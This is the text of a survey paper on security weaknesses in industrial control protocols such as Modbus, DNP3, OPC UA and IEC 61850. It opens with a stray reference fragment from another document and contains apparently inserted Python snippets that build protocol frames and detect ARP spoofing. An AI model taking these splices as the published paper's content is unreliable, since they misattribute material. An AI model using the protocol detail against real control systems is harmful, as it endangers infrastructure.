Under the EECC. [Online]. Available: https://www.enisa.europa.eu/publications/5g- supplement-security-measure% s-under-eecc/ [261] (2020). N. I. of Standards and Technology. SP 800-124 rev. 2Guidelines for Managing the Security of Mobile Devices in the Enterprise. [Online]. Available: https://csrc.nist.gov/publications/detail/sp/800-124/rev- 2/draft [262] (2020). National Institute of Standards and Technology. NIST Releases Draft Guidance on Internet of Things Device Cybersecurity . [Online]. Available: https://www.nist.gov/news-events/news/2020/12/nist- releases-draft-guida% nce-internet-things-device-cybersecurity [263] The European Union Agency for Cybersecurity (ENISA). Guidelines for securing the Internet of Things. (2020). [Online]. 
Security_Challenges_in_Control_Network_Protocols_A_Survey.pdf
With the ongoing adoption of remotely communicating and interacting control systems harbored by critical infrastructures, the potential attack surface of such systems also increases drastically. Therefore, not only the need for standardized and manufacturer-agnostic control system communication protocols has grown, but also the requirement to protect those control systems' communication. There have already been numerous security analyses of different control system communication protocols; yet, these have not been combined with each other sufficiently, mainly due to three reasons: First, the life cycles of such protocols are usually much longer than those of other Internet and communication technologies, therefore legacy protocols are often not considered in current security analyses. Second, the usage of certain control system communication protocols is usually restricted to a particular infrastructure domain, which leads to an isolated view on them. Third, with the accelerating pace at which both control system communication protocols and threats against them develop, existing surveys are aging at an increased rate, making their re-investigation a necessity. In this paper, a comprehensive survey on the security of the most important control system communication protocols, namely Modbus, OPC UA, TASE.2, DNP3, IEC 60870-5-101, IEC 60870-5-104, and IEC 61850 is performed. To achieve comparability, a common test methodology based on attacks exploiting well-known control system protocol vulnerabilities is created for all protocols. In addition, the effectiveness of the related security standard IEC 62351 is analyzed by a pre- and post-IEC 62351 comparison.
Security Challenges in Control Network Protocols: A Survey
Anna Volkova, Michael Niedermeier, Robert Basmadjian, and Hermann de Meer
(Manuscript received October 10, 2017; revised April 11, 2018 and July 20, 2018; accepted September 1, 2018. Date of publication September 26, 2018; date of current version February 22, 2019. Corresponding author: Michael Niedermeier. The authors are with the Computer Networking Laboratory, Department of Computer Science and Mathematics, University of Passau, 94032 Passau, Germany (e-mail: [email protected]; [email protected]; [email protected]; [email protected]). Digital Object Identifier 10.1109/COMST.2018.2872114)
Index Terms: Control systems, network protocols, network security.
I. INTRODUCTION: CONTROL NETWORKS IN THE CHANGE OF TIME
THE NEED to take fast and cost-effective decisions in a global market pressures service providers to enhance their infrastructures using remotely accessible control networks. A prime example of such networked control systems are Supervisory Control and Data Acquisition (SCADA) systems, used to operate and monitor a wide portion of industrial facilities and processes, often distributed over large geographic areas. To be able to signal and control such systems, the previous isolation of SCADA systems has been more and more reduced. Company networks and later on even remote access were allowed to control SCADA systems using telecontrol technologies. Due to the fast development of Information and Communications Technology (ICT), and particularly networking technology, the adoption of the Internet, and the need to remotely control systems from anywhere around the world, the complete isolation (i.e., an "air gap") between control networks and potentially publicly accessible networks became illusory [1].
Standard computer systems and their security measures adapted and grew to match the new requirements of this interconnected world. In contrast, most control systems were developed in the 1970s and designed to match the lifetime of the devices they were controlling, which would easily have a lifecycle of some 30 years. As most techniques in control systems, including hardware, software and networking, were therefore designed long before network security was perceived to be a requirement, challenges rapidly began to develop. Unfortunately, it took a long time for researchers and industrial stakeholders to realize the importance of network security, until worldwide attacks on control systems (e.g., [2]-[4]) became more prevalent. Two examples of such control system security incidents are described below:
• Attack on Maroochy Water Services, Australia: In 2000, a former employee of the Maroochy Water Services in Australia gained access to the water pumping SCADA system and released tons of sewage water into parks, rivers and residences. The damage to the company and the environment was enormous. The employee, who helped install the SCADA system in this area, exploited the lack of security policies and defense mechanisms to launch a series of attacks against different pumping systems of the company. He disguised his actions as normal malfunctions that needed to be physically repaired. The culprit was only arrested by chance, when he was stopped by a police patrol [2].
• Attack on public tram system in Lodz, Poland: In 2008, a teenager was able to hack the SCADA system controlling the public tram system in Lodz, Poland.
He gained full access to the system, which had no security measures implemented, and controlled the trains with a self-built remote control that was able to send signals to the Remote Terminal Units (RTUs) controlling the junctions. Several trains were derailed and passengers were hurt during this attack [4].
The persistent challenge control system networks have been facing is that they inherit security weaknesses from outside networks, putting industrial production, environmental integrity and human safety at risk [5]. One of the foremost weaknesses exploited in industrial control networks is vulnerabilities in the communication protocol standards and implementations [6]-[8]. However, until now, no comprehensive analysis regarding the vulnerabilities and attacks of the most well-known control system protocols has been realized.
A. Research Objective
Looking at control system communication protocols (CSCPs), one can notice that there has been a broad and long-lasting series of such protocols, which were often developed a long time ago. In this regard, there have been several survey works in the literature (see Section II) that tackled specific protocols from different perspectives. What is currently lacking is a single methodology that describes those protocols by looking at the problems from multiple dimensions. In this paper, we propose such a methodology as our research objective, which allows us, based on a unified adversary model, to qualitatively describe and structurally classify communication protocols for control systems based on their threat levels. Our work provides the following contributions:
1) We propose a unified methodology to analyze the security of the most relevant CSCPs from the IEC 62351 standard's perspective.
2) We carry out a security assessment of CSCPs by considering pre- and post-implementation of the IEC 62351 standard.
3) We compose a fine-granular adversary model and attack scenarios that are essential in the context of Industrial Control Systems (ICSs).
4) We provide general protection measures as well as several security recommendations to improve the IEC 62351 standard and CSCPs.
5) We review well-known enhanced versions of legacy CSCPs and analyze them in the context of real-life scenarios.
B. Structure
The remainder of this paper is structured as follows: Section II illustrates related work. Section III elaborates on the seven most important as well as five enhanced legacy CSCPs and describes general requirements and challenges of control network protocols. In Section IV, the adversary model considered in this paper is addressed. The security methodology and the protocol analysis are covered in Section V. The paper is concluded in Section VI, and future research directions are pointed out in Section VII.
II. RELATED WORK
The research area around control system protocols and their security challenges has been investigated for several decades already.
The previous related work can be classified into three different types of contributions:
• Generic surveys, which covered general attack possibilities on a high abstraction level (Section II-A),
• Control system security analyses covering a single or a few protocols at most (Section II-B), or
• Security research which focuses only on very specific types of attacks (Section II-C).
In the following, prominent examples of all three types of contributions are discussed.
A. Overview-Type Related Work
Dzung et al. [9] provide a survey including security goals in control networks, possible attack vectors, and security solutions to mitigate them. The survey gives a detailed overview of the current goals and challenges in control networks as well as partially in CSCPs; however, no further analysis of the protocols regarding their vulnerabilities is provided. Mohagheghi et al. show a detailed survey regarding both legacy CSCPs and their challenges as well as future trends in control systems in [10]. The paper mainly compares legacy protocols to the newer IEC 61850 standard, but does not put a major focus on security challenges. Johnson explores the weaknesses of SCADA-based systems in [11]. Also, several methods and tools are proposed to augment SCADA security. An overview of SCADA system components and the protocols Distributed Network Protocol (DNP3), IEC 60870-5, as well as IEC 60870-5-101 is given by Alsiherov and Kim [12]. Furthermore, the security standard IEC 62351 is briefly introduced and security measures on the transport and network layer are discussed; security features of CSCPs are, however, not part of the paper. An overview of incidents related to missing SCADA security with a clear classification of attacks and the impact of incidents is given in [2] by Miller and Rowe. Robinson presents an adversary model as well as an overview on threat actors for SCADA systems in general and discusses security breaches in CSCPs [13]. The paper delivers security recommendations for ICSs in general. The risks to SCADA and ICS as well as the methods used by attackers to exploit vulnerabilities in those systems are investigated in [14] by Bartman and Carson. The paper additionally covers mitigation strategies for the discussed threats. While the analysis covers many attack vectors and threats, it does not focus on CSCPs specifically; in contrast, the focus is set on mitigation strategies ranging from (physical) tamper detection to network security.
Instead of giving an abstract overview of overarching problems in ICSs, SCADA, and/or CSCPs in general, our survey covers detailed attack scenarios for the most relevant CSCPs and gives concrete information regarding the expected impact of attacks. Also, mitigation strategies are provided.
B. Protocol-Specific Related Work
Michalski et al. perform an in-depth analysis of the Telecontrol Application Service Element 2 (TASE.2) protocol in [15]. This covers both a detailed analysis of TASE.2 and its intended goals and functions, as well as possible security challenges and mitigation strategies. Schwarz and Börcsök investigate the security of Open Platform Communications (OPC) Unified Architecture (UA) both on the application and communication layers in [16], which includes a fine-granular description of the protocol itself as well as its current challenges. Krotofil and Gollmann [17] provide a survey of selected state-of-the-art control system security methods.
While there are several security-related research papers cited, the work mainly revolves around the Modbus protocol and DNP3. Drias et al. [18] analyze control systems and their security requirements in general without applying a specific focus. Regarding the CSCPs, again Modbus and DNP3 are briefly investigated. A testbed-based approach to study and simulate the various available techniques for securing and protecting SCADA systems against a wide range of cyber attacks is discussed in [19]. The developed testbed is then used to analyze Denial of Service (DoS) and compromised Human Machine Interface (HMI) attacks on the Modbus and DNP3 protocols. While the testbed-based approach in [19] offers a realistic scenario for the security assessment of SCADA systems, both the discussion of the adversary model as well as the analysis of security flaws within CSCPs are very brief. East et al. [20] present a taxonomy of attacks on DNP3. The attacks are classified based on targets (control center, outstation devices and network/communication paths) and threat categories (interception, interruption, modification and fabrication). The attack taxonomy clarifies the nature and scope of threats to DNP3. Lee et al. [21] analyze DNP3 and its existing security-enhanced variants DNPSec and DNP3 Secure Authentication (SA). In addition, a new secure version of DNP3 named DNP3 Authenticated Encryption is developed and compared to DNP3, DNPSec, and DNP3 SA. Pidikiti et al. discuss a wide range of vulnerabilities and subsequent attacks on the IEC 60870-5-101 and IEC 60870-5-104 protocols in [22]. Matoušek provides an overview of IEC 60870-5-104 in [23] with a detailed description of the protocol's Application Protocol Control Information (APCI) and Application Service Data Unit (ASDU) formats. Additionally, the security challenges currently present in IEC 60870-5-104 are analyzed. An analysis of vulnerabilities in the Modbus and International Electrotechnical Commission (IEC) 61850 protocols is the topic of [24]. For both protocols, two different types of attacks are assessed: flawed/missing cryptographic protection and memory corruption vulnerabilities. In [25], an evaluation method for SCADA cyber security based on testbeds is presented. The proposed test environment reflects the real control and supervision substation of an electricity generation and distribution control system. Special focus is placed on the analysis of the overall behavior of both the IEC 60870-5-104 and IEC 61850 protocols. Similar to [19], the paper offers a testbed-focused approach, which however restricts its scenarios regarding both the type of attackers and the investigated protocols.
If not stated otherwise, the difference between our survey and the aforementioned work is that they only cover one or two CSCPs, while our survey investigates the seven most widely used CSCPs as well as three enhanced versions of Modbus and two of DNP3, and compares them using a unified methodology. Therefore, this difference is not explicitly stated for each related work.
C. Attack-Specific Related Work
Maynard et al. present Man-in-the-Middle (MitM) attacks on the IEC 60870-5-104 protocol in [26].
Address Resolution Protocol (ARP) spoofing-based MitM attacks on the Modbus and DNP3 protocols are investigated by Yang et al. [27] in a cyber-security testbed which contains SCADA software and communication infrastructures. Apart from that, future plans on implementing intrusion detection and prevention technology to address cyber-security issues in SCADA systems are presented. Both papers offer a deep investigation of a single attack; however, their contribution is limited due to the specialized focus.
In comparison, our survey covers multiple attacks that threaten all three main security goals (confidentiality, integrity, availability). Tables I and II offer an overview of the currently existing work and the research areas covered. It is noted here that not all entries in Tables I and II are explicitly addressed in this section due to space restrictions. To give a more comprehensive overview, however, further related work is included in Tables I and II.
TABLE I. CLASSIFICATION OF RELATED WORK (PART 1)
TABLE II. CLASSIFICATION OF RELATED WORK (PART 2)
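As a purely illustrative complement to the ARP-spoofing-based MitM attacks of [26], [27]: such attacks poison the IP-to-MAC bindings of hosts on the control network, so even a passive consistency check over observed ARP replies can reveal them. The sketch below is a minimal example of that idea under simplifying assumptions; the addresses are fabricated, and a real monitor would feed the observations from a packet capture rather than a hard-coded list.

```python
from typing import Dict, List, Optional, Tuple

class ArpWatch:
    """Minimal passive ARP monitor: remember the first MAC seen for each IP
    and report replies that silently rebind the address (a spoofing symptom)."""

    def __init__(self) -> None:
        self.bindings: Dict[str, str] = {}

    def observe(self, ip: str, mac: str) -> Optional[str]:
        known = self.bindings.get(ip)
        if known is None:
            self.bindings[ip] = mac      # first sighting: learn the binding
            return None
        if known != mac:                 # same IP, different MAC: suspicious
            return f"ALERT: {ip} rebound from {known} to {mac}"
        return None

if __name__ == "__main__":
    # Fabricated ARP replies as (IP, MAC) tuples; the last one mimics an
    # attacker claiming the HMI's address.
    replies: List[Tuple[str, str]] = [
        ("192.0.2.10", "00:11:22:33:44:55"),   # HMI
        ("192.0.2.20", "00:11:22:33:44:66"),   # RTU
        ("192.0.2.10", "de:ad:be:ef:00:01"),   # spoofed reply
    ]
    watch = ArpWatch()
    for ip, mac in replies:
        alert = watch.observe(ip, mac)
        if alert:
            print(alert)
```

Such a check is obviously heuristic (legitimate hardware replacement also rebinds an IP), but it illustrates why static ARP entries and monitoring are common mitigations in control networks.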
III. CONTROL NETWORK PROTOCOLS: OVERVIEW, REQUIREMENTS AND CHALLENGES
In this section, we first give an overview of the most relevant CSCPs, and then present their requirements in terms of security and performance. This section is concluded by illustrating the implementation challenges of CSCPs in ICSs.
A. Overview
The CSCPs analyzed in this survey are selected based on two requisites. First, the chosen protocols need to be of major importance within the sector of industrial control systems. Second, only standard protocols (and their security-enhanced variants) are considered in this survey; proprietary solutions are omitted. The chosen protocols (Modbus, OPC UA, TASE.2, DNP3, IEC 60870-5-101, IEC 60870-5-104, and IEC 61850) all fulfill these prerequisites [45]-[47]. Fig. 1 depicts an overview of the aforementioned seven protocols and the enhanced variants of Modbus and DNP3 (marked in green) as well as the protocols they are derived from.
Fig. 1. Protocol overview and ISO/OSI layer coverage.
The letters located to the right of each marked node represent the International Organization for Standardization (ISO)/Open Systems Interconnection (OSI) layers covered by the respective protocol. The letters are abbreviations of: A for the application layer, T for the transport layer, N for the network layer, DL for the data link layer, and P for the physical layer. Note that in the rest of this section, while presenting the message structure of specific protocols, we use the following semantics in the corresponding figures: the width of each message is 1 Byte (demonstrated only in Fig. 3, whereas for the other figures it is eliminated to save space). Furthermore, whenever the size of a specific field of a message is longer than 4 Bytes, we present the undefined field size with "...", such as for Data in Fig. 3.
1) Modbus: The Modbus protocol was developed and published by Modicon in 1979 and is foremost used in process automation. Modbus is still widely used, mainly because it is an open standard and has a simple structure. The responsibility for the maintenance and further development of the protocol lies with the Modbus organization.
Fig. 2. ISO/OSI layer structure of Modbus protocol.
Fig. 3. Modbus message structure.
Modbus defines two different transmission methods: First, Modbus serial, which is used for communication via serial interfaces such as RS232 and RS485. Second, Modbus Transmission Control Protocol (TCP)/Internet Protocol (IP), which supports communication over a TCP/IP network. Two different transmission modes are defined for Modbus serial transmissions:
• Modbus RTU, for binary data encoding,
• Modbus American Standard Code for Information Interchange (ASCII), which encodes the data using an ASCII character set in the form of readable character strings.
Modbus works according to the master/slave principle. A master can communicate with one or more slaves. Only the slave explicitly addressed by the master may return data to the master. The protocol supports only binary and 16-bit values, which are read by the master in blocks. Neither quality markings nor time stamps are supported. Fig. 2 shows the ISO/OSI layer structure of the Modbus protocol, whereas Fig. 3 depicts the structure of a Modbus serial message.
There have been attempts to secure the Modbus protocol over time, e.g., in [28] (referred to as Modbus-F2009 from here on), [29] (referred to as Modbus-S2015 from here on), and [30] (referred to as Modbus-A2018 from here on). Modbus-F2009 only offers integrity and authentication, while Modbus-S2015 and Modbus-A2018 provide confidentiality, integrity and authentication by applying well-known network security methods, such as symmetric and asymmetric cryptography, authentication, and replay protection mechanisms. More precisely, the Modbus successors have the following properties:
• Modbus-F2009: Rivest, Shamir and Adleman (RSA) signatures and Secure Hash Algorithm (SHA)-2 hashing are used to provide security.
• Modbus-S2015: Both RSA signatures and SHA-2 hashing are employed, similar to Modbus-F2009. However, in addition, Advanced Encryption Standard (AES) encryption is used for confidentiality.
• Modbus-A2018: A challenge-response authentication mechanism and AES encryption are employed to secure the protocol.
In the further analysis, the original Modbus protocol as well as its secure modifications are investigated.
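To make the serial frame layout of Fig. 3 (address, function code, data, CRC) concrete, the sketch below assembles a Modbus RTU "read holding registers" request (function code 0x03) and appends the CRC-16 used by Modbus (initial value 0xFFFF, reflected polynomial 0xA001, transmitted low byte first). It is a minimal, illustrative sketch with an arbitrary slave address and register range, not a complete Modbus implementation.

```python
import struct

def modbus_crc16(frame: bytes) -> int:
    """CRC-16/Modbus: initial value 0xFFFF, reflected polynomial 0xA001."""
    crc = 0xFFFF
    for byte in frame:
        crc ^= byte
        for _ in range(8):
            if crc & 1:
                crc = (crc >> 1) ^ 0xA001
            else:
                crc >>= 1
    return crc

def read_holding_registers(slave: int, start_addr: int, quantity: int) -> bytes:
    """Build a Modbus RTU request: slave address, function 0x03, data, CRC."""
    pdu = struct.pack(">BBHH", slave, 0x03, start_addr, quantity)
    return pdu + struct.pack("<H", modbus_crc16(pdu))  # CRC low byte first

if __name__ == "__main__":
    # Arbitrary example: ask slave 0x11 for 3 registers starting at 0x006B.
    frame = read_holding_registers(slave=0x11, start_addr=0x006B, quantity=3)
    print(frame.hex(" "))
```

The same two-byte address/function prefix and trailing CRC apply to all RTU frames, which is one reason the basic protocol offers neither authentication nor integrity protection beyond transmission-error detection.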
2) OPC/OPC UA: OPC was first released in 1996 by the OPC Foundation, at the time under the name "Object Linking and Embedding for Process Control". The OPC protocol is today widely used in process automation, most notably to interconnect process data to HMI devices.
OPC employs a client/server principle, where a client (master) can access one or more servers (slaves). A server acts as data provider for the clients that obtain the data. OPC defines a number of interfaces serving various purposes, which are named in the following:
• Data Access (DA): This interface is the most well-known and is used to access process data.
• Alarm and Event (AE): The AE interface supplements the DA and is used to transmit events and alarms.
• Historical Data (HD): A supplement to the DA interface, which can transfer historical data.
• DA XML: Based on the DA interface, this relatively new interface uses eXtensible Markup Language (XML) for encoding DA content.
The latest development of the OPC standard is OPC UA, which was released in 2006 and combines the previous technologies from OPC DA, AE and HD. It is a pioneering standard for Industry 4.0 and the Internet of Things (IoT). In contrast to most other CSCPs, the TCP/IP-based, service-oriented protocol offers both encryption and user authentication mechanisms. The most striking difference between OPC UA and its predecessors, though, is that it no longer is a Microsoft Windows exclusive protocol, but is available on numerous operating systems as well as on-chip solutions. The ISO/OSI stack of OPC UA is depicted in Fig. 4, and the message structure of OPC UA binary is shown in Fig. 5.
Fig. 4. ISO/OSI layer structure of OPC UA protocol.
Fig. 5. OPC UA message structure.
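To make the OPC UA binary framing of Fig. 5 more tangible, the sketch below parses the fixed 8-byte header that precedes every OPC UA TCP message: a 3-byte ASCII message type (e.g., HEL, ACK, OPN, MSG), a 1-byte chunk indicator, and a 4-byte little-endian total message size. This is a simplified illustration of the header only; security headers, sequence headers and chunk reassembly are omitted, and the sample bytes are fabricated.

```python
import struct
from typing import NamedTuple

class UaHeader(NamedTuple):
    message_type: str   # e.g. "HEL", "ACK", "OPN", "MSG", "CLO", "ERR"
    chunk_type: str     # "F" = final, "C" = intermediate, "A" = abort
    message_size: int   # total size in bytes, including this 8-byte header

def parse_ua_header(data: bytes) -> UaHeader:
    if len(data) < 8:
        raise ValueError("OPC UA TCP header is 8 bytes long")
    msg_type = data[0:3].decode("ascii")
    chunk = chr(data[3])
    (size,) = struct.unpack_from("<I", data, 4)   # little-endian uint32
    return UaHeader(msg_type, chunk, size)

if __name__ == "__main__":
    # Fabricated example: a final MSG chunk announcing a 64-byte message.
    sample = b"MSG" + b"F" + struct.pack("<I", 64) + b"\x00" * 56
    print(parse_ua_header(sample))
```

Everything that follows this header (secure channel identifiers, security policy, encrypted body) is where OPC UA differs most visibly from the legacy CSCPs discussed in this section.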
3) TASE.2/ICCP/IEC 60870-6: TASE.2 (which is similar to IEC 60870-6 and the Inter-control Center Communications Protocol (ICCP)) is a standard used for wide-area communication between control centers in the electric power transmission network, which was standardized in 1997 by the IEC. It enables the exchange of time-critical information between control systems via Wide Area Network (WAN) and Local Area Network (LAN). Its scope is similar to that of OPC, but it is, unlike early versions of OPC, not tied to a particular operating system.
The standard by itself does not address authentication or encryption (these services may be provided by lower protocol layers, though). TASE.2 relies on the Manufacturing Messaging Specification (MMS); its core functions are specified as sets of so-called "Conformance Blocks", such as, e.g., periodic system data, device control, etc. The ISO/OSI layer structure of TASE.2 is given in Fig. 6. Its message structure is depicted in Fig. 7.
Fig. 6. ISO/OSI layer structure of TASE.2 protocol.
Fig. 7. TASE.2 message structure.
4) DNP3: The DNP3 protocol is developed for communication with telecontrol substations and other Intelligent Electronic Devices (IEDs). It is especially tailored for usage in energy-related SCADA systems and is widely adopted by North American power system utilities. The development was originally carried out by the Harris company, which in 1993 turned the development and maintenance over to the DNP3 User Group, an association of users and suppliers of the protocol.
Originally, the DNP3 protocol was developed for use on slow, serial communication links. However, during the development of DNP3, support for communication via TCP/IP networks was also implemented. In contrast to similar protocols, such as IEC 60870-5-101, DNP3 has a very powerful user layer (a layer on top of the ISO/OSI application layer, containing user data), which allows the data to be decoded even without implicit parameters. DNP3 has a variety of ways to display information objects and provides a high degree of interoperability on the user layer. This is achieved at the cost of increased complexity, which in turn requires a high implementation and testing effort.
Unlike IEC 60870-5-101, the protocol has a transport layer that allows a fragmented transmission of large amounts of data. This benefits the protocol when communicating over TCP/IP, because the entire bandwidth of the network can be effectively utilized. Another advantage over IEC 60870-5-101 is the possibility to request an acknowledgment from the other side on the user layer. As a result, a substation can remove the data from the buffer depending on whether these have been acknowledged by the destination.
The data link layer is based on IEC 60870-5-1 and IEC 60870-5-2, similar to IEC 60870-5-101. However, only a balanced mode is used, which is intended only for full-duplex point-to-point connections. Since DNP3 is also used in semi-duplex networks, a collision avoidance mechanism exists. The ISO/OSI layer structure of DNP3 is depicted in Fig. 8, while the message structure of DNP3 is visible in Fig. 9.
Fig. 8. ISO/OSI layer structure of DNP3 protocol.
Fig. 9. DNP3 message structure.
Similar to the Modbus protocol, it is noteworthy that several attempts were made to secure DNP3 already, the most well-known ones being the DNPSec [32] and DNP3 SA (which is part of the Institute of Electrical and Electronics Engineers (IEEE) 1815-2012 standard [48]) [36] protocols, offering the following security features:
• DNPSec: The DNPSec protocol employs Triple Data Encryption Standard (3-DES) and Hash-based Message Authentication Code (HMAC) SHA-1 to provide security.
• DNP3 SA: In contrast to DNPSec, no encryption is used. Integrity and authentication are provided by challenge-response HMAC/Galois Message Authentication Code (GMAC) and SHA-2 hashing.
It needs to be noted at this point that the cryptographic algorithms employed in DNPSec (3-DES and SHA-1) are considered broken by now and are insecure against sophisticated attacks [49], [50]. Therefore, during the security analysis in Section V-C, the security features of DNPSec are regarded as ineffective against attacks. In the following, the original DNP3 protocol as well as both DNPSec and DNP3 SA are included in the security analysis of this paper.
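To relate the DNP3 message structure of Fig. 9 to concrete bytes, the sketch below assembles a DNP3 link-layer header block: the start octets 0x05 0x64, a length octet, a control octet, 16-bit destination and source addresses (transmitted least significant byte first), and a CRC computed with the DNP3-specific polynomial. It is a minimal illustration under simplifying assumptions (no transport or application layer, arbitrary addresses, an example control octet), not a usable DNP3 stack.

```python
import struct

def dnp3_crc(block: bytes) -> int:
    """CRC-16/DNP: reflected polynomial 0xA6BC, init 0x0000, result complemented."""
    crc = 0x0000
    for byte in block:
        crc ^= byte
        for _ in range(8):
            if crc & 1:
                crc = (crc >> 1) ^ 0xA6BC
            else:
                crc >>= 1
    return (~crc) & 0xFFFF

def dnp3_link_header(dest: int, src: int, control: int = 0xC4) -> bytes:
    """Build a DNP3 link-layer header block: 0x05 0x64, length, control, dest, src, CRC."""
    # The length octet counts control + destination + source (+ user data): here 5.
    block = struct.pack("<BBBBHH", 0x05, 0x64, 5, control, dest, src)
    return block + struct.pack("<H", dnp3_crc(block))   # CRC low byte first

if __name__ == "__main__":
    # Arbitrary example addresses: master (address 1) talking to outstation 10.
    print(dnp3_link_header(dest=10, src=1).hex(" "))
```

Nothing in this header authenticates its origin, which is precisely the gap DNPSec and DNP3 SA try to close at higher layers.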
A great advantage of IEC 60870-5-101 is the robustness of the data link and the simple structure of the application layer. The focus was placed on performance during the de nition. To achieve this, certain information required to decode thedata is not sent. The decoding of the data is only possible with correctly set parameters such as size of the information object address, size of the ASDU address, etc. In practice, thematching of parameters between components with the help ofthe interoperability list is easily possible and does not represent a major challenge. A major disadvantage however are the gaps in the de ni- tion of the protocol, which often lead to problems. Particularly with respect to line redundancy, many different implementa- tions exist, which require project-speci c clari cations. Fig. 10Fig. 10. ISO/OSI layer structure of IEC 60870-5-101 protocol. Fig. 11. IEC 60870-5-101 message structure. shows the ISO/OSI layer structure of IEC 60870-5-101, Fig. 11shows the IEC 60870-5-101 message structure. 6) IEC 60870-5-104: The IEC 60870-5-104 protocol is an international standard and was released in 2000 by the IEC. As the name of the standard network access for IEC 60870-5- 101 using standard transport pro les suggests, the protocol isdeeply linked with IEC 60870-5-101. IEC 60870-5-104 allowscommunication between the control center and the substation via a standard TCP/IP network. The TCP protocol is especially used for connection-oriented and secure data transmission. IEC 60870-5-104 limits the information types and con g- uration parameters de ned in IEC 60870-5-101 so that not all IEC 60870-5-101 functions are also supported by IEC60870-5-104. Among others, IEC 60870-5-104 does not sup-port short time stamps; also, the sizes of the individual address elements are permanently set to maximum values. In prac- tice, however, manufacturers often place the IEC 60870-5-101application layer on the IEC 60870-5-104 transport pro le without taking its limitations into consideration. This can lead to problems with devices which strictly adhere to the standard. Authorized licensed use limited to: Air Force Institute of Technology. Downloaded on February 11,2025 at 16:35:20 UTC from IEEE Xplore. Restrictions apply. 626 IEEE COMMUNICATIONS SURVEYS & TUTORIALS, VOL. 21, NO. 1, FIRST QUARTER 2019 Fig. 12. ISO/OSI layer structure of IEC 60870-5-104 protocol. Fig. 13. IEC 60870-5-104 message structure. Fig. 14. Parts of IEC 61850. Interoperability between devices from different manufacturers is ensured by means of the so-called interoperability list , thestructure of which is de ned in the standard. The main advantage of IEC 60870-5-104 is communica- tion over a standard network, which allows simultaneous datatransmission with several devices and services. Otherwise, the advantages and disadvantages of IEC 60870-5-101 apply to IEC 60870-5-104, too. Fig. 12depicts the ISO/OSI layer struc- ture of IEC 60870-5-104, Fig. 13shows the IEC 60870-5-104 message structure. 7) IEC 61850: IEC 61850 is the latest standard for commu- nication networks and systems in substations and encompasses a large variety of concepts including 10 parts, depictedin Fig. 14. Apart from the rst two parts covering the introduction and glossary, parts 3, 4, and 5 of the standard start by identi-fying the general and functional requirements for substationcommunication. 
In order to assist the configuration of all components from a system-level perspective, an XML-based Substation Configuration Language (SCL) is defined in IEC 61850-6. It allows the relationships between the substation automation system and the substation itself to be defined. To provide information regarding its configuration, each device in the system must provide an SCL file. One of the main architectural novelties introduced by IEC 61850 is an abstract definition of its data items, which first allows the creation of data items and services that are agnostic regarding their underlying protocols. Second, these abstract items can be mapped onto any underlying protocol. While the definition of abstract data items is covered in IEC 61850-7, the specific mapping onto Generic Object Oriented Substation Events (GOOSE), MMS or Sampled Values (SV) is included in IEC 61850-8 and IEC 61850-9, respectively. IEC 61850-10 defines conformance testing against the numerous protocol definitions and constraints defined in the document.

While the standard covers the needs of station automation regarding communication structures and the object-related data model, it is generally designed to also support many other automation applications. The basic principles are retained and supplemented by sector-specific data models, e.g., for the communication, monitoring and control of wind power plants or hydroelectric power stations. Unlike IEC 60870-5-104, IEC 61850 is only defined for the station bus. From a technical point of view, however, IEC 61850 is also suited for process data transmission between stations and network control systems. This allows a complete system architecture from the process to the station control system and the grid control point without requiring the application of gateways. The IEC 61850 ISO/OSI layer structure is visible in Fig. 15, and Fig. 16 shows the IEC 61850 message structure.

Fig. 15. ISO/OSI layer structure of IEC 61850 protocol.
Fig. 16. IEC 61850 message structure.

B. Protocol Security Overhead

In the protocol overview, several modernized variants of Modbus and DNP3 are discussed. It needs to be noted here, however, that the increased security realized within the discussed protocol variants comes at the price of performance, mainly due to the en-/decryption and signature procedures used. While the performance overhead incurred by such security measures is commonly not a major issue, in the context of control systems there are often real-time performance requirements (see Section III-D). Therefore, in this section, a brief overview of the performance overheads of the enhanced variants of the Modbus and DNP3 protocols is given.

- Modbus-F2009: Fovino et al. [28] state that in their test scenarios, the protocol causes a performance overhead of 291% at maximum and 12% at minimum (relative to the original Modbus protocol).
- Modbus-S2015: To the best of our knowledge, there is currently no information available regarding the performance overhead incurred by the usage of Modbus-S2015. However, it is expected that the overhead is at least as high as with Modbus-F2009, as both employ signatures and SHA-2, and in addition, Modbus-S2015 uses encryption.
- Modbus-A2018: According to [30], the Modbus-A2018 protocol variant leads to a performance overhead of 500% at maximum and 0% at minimum (relative to the original Modbus protocol).
- DNPSec: To the authors' knowledge, there is no quantitative performance evaluation available investigating the DNPSec protocol. However, Lee et al. [21] provide a qualitative estimation of the performance overhead, which is considered high.
- DNP3 SA: Similar to DNPSec, [21] states that the performance overhead is considered medium. However, the performance of DNP3 SA also depends on the usage of the non-aggressive or aggressive mode (further information is available in IEEE 1815-2012).

TABLE III. OVERVIEW AND COMPARISON OF PROTOCOL FEATURES (PART 1)
TABLE IV. OVERVIEW AND COMPARISON OF PROTOCOL FEATURES (PART 2)

C. Requirements

For the above-described CSCPs applied in the industrial context, three basic security requirements need to be considered in addition to the corresponding protocol's performance, as this has a significant impact on the practicability of the proposed solution. Next, we give the exact definition of the security requirements considered in this paper, which are based on the ones illustrated in the technical specification report IEC 62351-1:

- Confidentiality: Prevention of unauthorized access to information by individuals, entities or processes.
- Integrity: Prevention of unauthorized modification or alteration of information.
- Availability: Prevention of denial of service and assurance of authorized and continuous access to information.

While all of these security goals exist in the context of ICSs as well, it is noteworthy that their relative importance is reordered. The most important goal in ICSs is availability, followed by integrity and confidentiality, in contrast to the usual CIA order.

Regarding performance, control systems have real-time requirements where decisions need to be taken quickly (within seconds), and any fraction of downtime could result in investment and reputation losses as well as environmental disasters. An application scenario can be found within the context of smart grids, where ICT plays an eminent role, especially in demand/response schemes. Here, real-time constraints are present, as the decisions on how resources are controlled have a drastic impact on the overall system behavior. In this context, the major objective is to match energy generation and consumption. If such a balance is not met, it jeopardizes the stability of the grid, which leads to brown- and blackouts.

D. Challenges

Control system security has been a wide-spread topic in the ICT community in recent years, in particular with regard to CSCPs. This development was only fostered by several successful attacks in the past receiving public attention, e.g., [2], [4], and [51]. While the development of control system communication standards is accelerating, the current situation with control systems is often coined by a discrepancy between old and new.

Numerous challenges can be highlighted in implementing security requirements within the context of networked control systems (e.g., SCADA) in practice. As previously mentioned, hardware/software and networking for such systems were designed and developed back in the 1970s, which consequently results in limited processing, storage and communication bandwidth.
